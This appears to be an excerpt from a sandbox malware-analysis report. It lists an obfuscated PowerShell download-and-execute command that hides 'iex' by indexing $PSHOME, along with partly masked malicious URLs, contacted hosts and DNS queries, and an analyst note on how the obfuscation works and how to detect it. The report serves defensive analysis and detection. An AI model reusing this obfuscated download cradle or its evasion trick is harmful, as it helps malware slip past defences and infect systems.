Technical Information
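- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "& ( $pShoME[21]+$PsHOmE[30]+'X') ([sTrIng]::jOiN( '', ('36a70>111x84p61>110f101a119:45z111>98!106>101f99z116x32p78!101z116_46o87x101_98z67o108>105o101p110p116!59>36:117z114a84:61o39_104o116f11...
  (Analyst note: with the default install path, `$pShoME[21]+$PsHOmE[30]+'X'` picks characters out of the $PSHOME path string to spell `ieX`, the alias for Invoke-Expression, so the literal string never appears on the command line. The joined list is decimal character codes separated by filler characters; the visible prefix decodes to `$FoT=new-object Net.WebClient;$urT='ht`, the start of a web-download routine. The command is truncated in this report, so the rest of the script is not shown. Because of the mixed case and indexing, detection is more reliable on the decoded script content, for example via PowerShell script block logging, than on a literal match of the command line.)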
- 'ba#####.psdsandbox.com':80
- 'st#####shelpforum.com':80
- 'st#####shelpforum.com':443
- 'pi####lly.com.mx':80
- 'sh###uzdag.ru':80
- http://www.ba#####.psdsandbox.com/aSnRPu8PfN/
- http://www.st#####shelpforum.com/XHdQXR/
- http://www.pi####lly.com.mx/eobirer/2RgP2ZMJxa/
- http://www.sh###uzdag.ru/Eb0qsTMvbU/
- 'st#####shelpforum.com':443
- DNS ASK ba#####.psdsandbox.com
- DNS ASK st#####shelpforum.com
- DNS ASK pi####lly.com.mx
- DNS ASK sh###uzdag.ru
- DNS ASK ma####achine.com (resolved only; no connection or HTTP request to this host appears among the entries listed here)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "& ( $pShoME[21]+$PsHOmE[30]+'X') ([sTrIng]::jOiN( '', ('36a70>111x84p61>110f101a119:45z111>98!106>101f99z116x32p78!101z116_46o87x101_98z67o108>105o101p110p116!59>36:117z114a84:61o39_104o116f11...' (with hidden window)